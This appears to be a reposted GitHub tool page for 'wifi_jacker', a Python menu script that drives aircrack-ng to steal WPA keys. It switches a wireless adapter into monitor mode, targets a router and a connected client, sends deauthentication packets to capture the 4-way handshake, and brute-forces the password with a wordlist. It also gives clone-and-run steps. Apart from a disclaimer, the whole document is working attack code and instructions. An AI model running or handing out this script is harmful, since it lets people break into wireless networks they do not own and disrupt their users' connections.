
wifi_jacker – a script that steals WPA keys.
LEGAL DISCLAIMER
The author does not accept any responsibility for misuse of this script. Remember that attacking targets without prior consent is illegal and punishable by law; this script was built to show how resource files can automate tasks.
wifi_jacker is a quick program that (potentially) steals WiFi keys via brute force. Hats off to the guys who made aircrack-ng. The success of this all depends on the strength of your password dictionary; good WPA keys will be harder to crack.
**** TO GET WIFI KEYS: ****
STEP 0: put your wifi adapter into monitor mode.
STEP 1: find a router MAC, then hone in with said MAC
STEP 2: find a client connected to the target router
STEP 3: force client to re-connect and leak the 4-way handshake
STEP 4: pray to your deity of choice that step 3 works.
STEP 5: crack password found in step 3 using your password list
Again, no guarantee that this works. Such is life/a reasonably strong WPA key.
**** INGREDIENTS: ****
+ Kali Linux/Backtrack, Linux Platform and aircrack-ng
+ a USB wifi adapter capable of entering monitor mode
+ a meaty password list (under this directory)
+ consent
TROUBLESHOOTING:
* This program assumes your USB wireless and monitor interfaces are named “wlan0” and “wlan0mon” respectively. Change these accordingly.
* if it messes up half way through, you probably need to manually put your usb wifi interface back into managed mode with ‘sudo airmon-ng stop <name of monitor interface>’
Script:
# wifi_jacker: an interactive menu that shells out (through sudo) to airmon-ng,
# airodump-ng, aireplay-ng and aircrack-ng.
#
# NOTE(review): this listing reached the page with its line breaks and
# indentation stripped. The nesting below is a best-effort reconstruction,
# in particular which statements sit inside each `if pid > 0:` and each
# `else:` branch. Confirm against the upstream file before relying on it.
import os, sys, re, time

'''
README:
this is a quick program that (potentially) steals WiFi keys via brute force
hats off to the guys who made aircrack-ng
the success of this all depends on the strength of your password dictionary
good WPA keys will be harder to crack

**** INGREDIENTS: ****
+ Kali Linux/Backtrack
+ a USB wifi adapter capable of entering monitor mode
+ a meaty password list (under this directory)
+ consent

**** TO GET WIFI KEYS: ****
STEP 0: put your wifi adapter into monitor mode.
STEP 1: find a router MAC, then hone in with said MAC
STEP 2: find a client connected to the target router
STEP 3: force client to re-connect and leak the 4-way handshake
STEP 4: pray to your deity of choice that step 3 works.
STEP 5: crack password found in step 3 using your password list

Again, no guarantee that this works. Such is life/a reasonably strong WPA key.
This is probably full of bugs that I will never fix

TROUBLESHOOTING:
*this program assumes your USB wireless and minotor interfaces are named "wlan0" and "wlan0mon" respectively. change these accordingly.
*if it messes up half way through, you probably need to manually put your usb wifi interface back into managed mode with 'sudo airmon-ng stop <name of monitor interface>'
'''

# Start-up banner. The spacing inside the ASCII art looks collapsed on this
# page, so it is reproduced exactly as shown.
# NOTE(review): sequences such as "\ " and "\_" are not valid string escapes;
# Python keeps the backslash, but newer Python 3 releases warn about them.
print( " *__ _ _ _ _ _ __ __*\n" +
    " *\ \ / (_) __(_) _ | |__ _ __| |_____ _ _ __ __/ \ / |*\n" +
    " *\ \/\/ /| | _|| | | || / _` / _| / / -_) '_| \ V / () || |*\n" +
    " *\_/\_/ |_|_| |_| \__/\__,_\__|_\_\___|_| \_/ \__(*)_|*\n\n\n")


class Wifi_Jacker:
    """Menu-driven wrapper that builds aircrack-ng suite commands and runs them with os.system.

    Every external command is assembled by string concatenation and executed
    through the shell under sudo. The only values that come from the keyboard
    and reach those strings are MAC addresses (regex-checked) and integers
    (passed through int()).
    """

    def __init__(self):
        """Set the default interface names and wordlist, then show the menu."""
        self.mon_mode = False          # True once airmon-ng start has returned 0
        self.usb_int = "wlan0"         # managed-mode interface name (hard-coded)
        self.mon_int = "wlan0mon"      # monitor-mode interface name (hard-coded)
        self.ap_MAC = None             # BSSID entered through option 3
        self.client = None             # client MAC entered through option 4
        self.wordlist = "rockyou.txt"  # wordlist file name, read from the current directory
        # The constructor does not return until the menu chain ends.
        self.welcome()

    def welcome(self):
        """Prompt for a menu option and dispatch to the matching method.

        The menu is re-shown by calling welcome() again from the handlers,
        so every selection deepens the call stack instead of looping.
        """
        picd = True
        while picd:
            # NOTE(review): on Python 2, input() evaluates what is typed as an
            # expression. Because this script runs its commands through sudo,
            # run it with Python 3, where input() returns a plain string.
            resp = input("*** please select an option ***\n\n" \
                        "1. put interface into monitor mode\n" \
                        "2. scan for router MACs\n" \
                        "3. hone in on a router/scan for clients\n" \
                        "4. force client deauth\n" \
                        "5. crack password\n"
                        "6. exit\n\n")
            try:
                resp = int(resp)
            except ValueError:
                # Non-numeric text stays a str and fails the range test below.
                pass
            # NOTE(review): range(1,8) also accepts 7, which no branch handles;
            # entering 7 ends the loop and this method returns without action.
            if resp not in range(1,8):
                pass
            else:
                picd = False
        if resp == 1:
            if not self.mon_mode:
                self.monmode_config(1)
            else:
                print("\ninterface already in monitor mode\n")
                self.welcome()
        elif resp == 2:
            if self.mon_mode:
                self.r_scan()
            else:
                print("\ninterface must be in monitor mode to scan\n")
                self.welcome()
        elif resp == 3:
            self.check_bssid()
        elif resp == 4:
            if self.ap_MAC is not None:
                self.c_reconnect()
            else:
                print("please search for a target AP via option #3 first")
                self.welcome()
        elif resp == 5:
            if self.ap_MAC is not None:
                self.crack()
            else:
                print("please search for a target AP via option #3 first\nalso, make sure you have a captured WPA key before doing this...")
                self.welcome()
        elif resp == 6:
            if self.mon_mode:
                self.monmode_config(-1)
            # NOTE(review): pkill matches by process name, so under sudo
            # `pkill python3` signals every python3 process on the machine,
            # not only this script's forks. Because of `&&`, it only runs
            # when the first pkill matched something. Presumably this script
            # is itself terminated before the lines below run.
            os.system("sudo pkill airodump-ng && sudo pkill python3") #this is stupid but it works
            print("BYE")
            sys.exit(0)

    def monmode_config(self, conf):
        """Switch the adapter into monitor mode (conf == 1) or back to managed mode (conf == -1).

        A non-zero status from os.system is converted into OSError, which is
        caught below and reported with a generic message.
        """
        try:
            if conf == 1:
                print("\nputting interface " + self.usb_int +" into monitor mode...")
                # Interface names are instance constants, not keyboard input.
                mon_up = os.system("sudo airmon-ng start " + self.usb_int)
                if mon_up == 0:
                    self.mon_mode = True
                else:
                    raise OSError
                print("interface now in monitor mode...\n")
                self.welcome()
            elif conf == -1:
                print("\nputting interface " + self.usb_int + " back into managed mode...")
                mon_down = os.system("sudo airmon-ng stop " + self.mon_int)
                if mon_down == 0:
                    self.mon_mode = False
                else:
                    raise OSError
        except OSError:
            print("something went wrong here. check your interface(s)")
            pass

    def r_scan(self):
        """Open airodump-ng on the monitor interface in an xterm window.

        os.fork() returns the child's pid in the parent and 0 in the child.
        As reconstructed here, the parent blocks in os.system until the
        xterm closes and then reaps the child, while the child goes
        straight back to the menu.
        """
        try:
            pid = os.fork()
            if pid > 0:
                os.system("sudo xterm -e airodump-ng " + self.mon_int)
                os.wait()
            self.welcome()
        except OSError:
            # NOTE(review): a failed fork is swallowed without any message.
            pass

    def check_bssid(self):
        """Ask for the access point's BSSID, validate it, then ask for a channel and call hone()."""
        picd = True
        while picd:
            bssid = input("please give the BSSID of the target AP (use '-' delimiter):")
            # re.match anchors at the start and `$` at the end, so only six
            # hex octets joined by one consistent separator (':' or '-') pass.
            # This check is what keeps typed text out of the shell string
            # that hone() builds. The test runs on a lowercased copy; the
            # text as typed is what gets stored.
            if re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", bssid.lower()):
                picd = False
                chan = self.check_chan(True)
                self.ap_MAC = bssid
                self.hone(bssid, chan)
            else:
                print("invalid MAC")
                pass

    def c_reconnect(self):
        """Ask for a client MAC and a packet count, then run aireplay-ng -0 in an xterm window.

        Unlike the other fork sites, os.fork() is not wrapped in try/except here.
        """
        picd = True
        while picd:
            bssid = input("please give the MAC of a client connected to target AP (use '-' delimiter):")
            # Same MAC pattern as check_bssid; nothing outside hex digits and
            # one separator character reaches the command string below.
            if re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", bssid.lower()):
                picd = False
                bssid = bssid.replace(":", "-")
                self.client = bssid
                # check_chan(False) returns an int: the packet count for -0.
                deez = self.check_chan(False)
                pid = os.fork()
                if pid > 0:
                    os.system("sudo xterm -e aireplay-ng -0 " + str(deez) + " -a " + str(self.ap_MAC) + " -c " + str(self.client) + " " + self.mon_int)
                    os.wait()
                print("*** IMPORTANT ***\n" \
                        "You now need to wait until you see 'WPA: <AP MAC>' \n"
                        "in the top right had corner of your honed-in airodump-ng screen,\n"
                        "this signifies that the 4-way handshake has been caught\n."
                        "If this doesn't happen within a reasonable timeframe, you:\n "
                        "1. Are shit out of luck,\n"
                        " as the client has not re-connected for some reason.\n"
                        " Try again with a different client.\n"
                        "2. Need to physically move closer to the target AP/client.")
                self.welcome()
            else:
                print("invalid client MAC")
                pass

    def check_chan(self, opt):
        """Prompt until an integer is entered and return it.

        opt selects the prompt text: True asks for a channel number, False
        for a packet count. int() guarantees that only an integer reaches
        the callers' command strings; no range check is applied.
        """
        picd = True
        while picd:
            if opt:
                chan = input("please specify channel #:")
            else:
                chan = input("please specify # of deauth packets to send (2 is good):")
            try:
                resp = int(chan)
                picd = False
                return resp
            except ValueError:
                # Not an integer: ask again.
                pass

    def hone(self, bssid, chan):
        """Run airodump-ng in an xterm, filtered to one BSSID and channel, writing capture files.

        `-w ./ ` uses "./" as the output prefix, so captures land in the
        current directory; crack() later reads "./-01.cap".
        """
        try:
            pid = os.fork()
            if pid > 0:
                # Normalise ':' separators to '-' and remember the BSSID.
                bssid = bssid.replace(":", "-")
                self.ap_MAC = bssid
                os.system("sudo xterm -e airodump-ng -c " + str(chan) + " --bssid " + str(bssid) + " -w ./ " + self.mon_int)
                os.wait()
            self.welcome()
        except OSError:
            print("something went wrong here. check your interface(s)")
            pass

    def crack(self): #assumes there is only one .cap file, but w/e
        """Run aircrack-ng on ./-01.cap with the configured wordlist, redirecting output to pword.txt.

        The typed answer is mapped to the constant "1" or "2" before use, so
        raw keyboard text never reaches the shell string.
        """
        k_type = input("what are we working with here? WEP, or WPA-PSK?")
        # Anything other than the exact string "WEP" selects "2".
        k_type = "1" if k_type == "WEP" else "2"
        try:
            pid = os.fork()
            if pid > 0:
                # NOTE(review): the tool's whole output, including any
                # recovered key, is written in clear text to pword.txt in the
                # current directory; treat that file as sensitive.
                os.system("sudo aircrack-ng -a" + k_type + " -b " + self.ap_MAC + " -w ./" + self.wordlist + " ./-01.cap > pword.txt")
                os.wait()
            print("cracking...")
            # Fixed five-second pause; it does not wait for the command to finish.
            time.sleep(5)
            print("check 'pword.txt' for your password! no guarantees")
            self.welcome()
        except OSError as ose:
            print("something went wrong here:\n", ose)
            pass


if __name__ == "__main__":
    # Constructing the object starts the interactive menu (see __init__).
    wj = Wifi_Jacker()
Usage:
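# Fetch the script and run it with Python 3.
# The script reads free-text prompts (MAC addresses) with input(). Python 2
# evaluates that text as an expression, which breaks MAC entry and means
# typed text is executed as code under sudo. The script's own exit path
# also targets python3 processes.
git clone https://github.com/hannay1/WiFi_Jacker && cd WiFi_Jacker
sudo python3 wifi_jacker.py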
Source: https://github.com/hannay1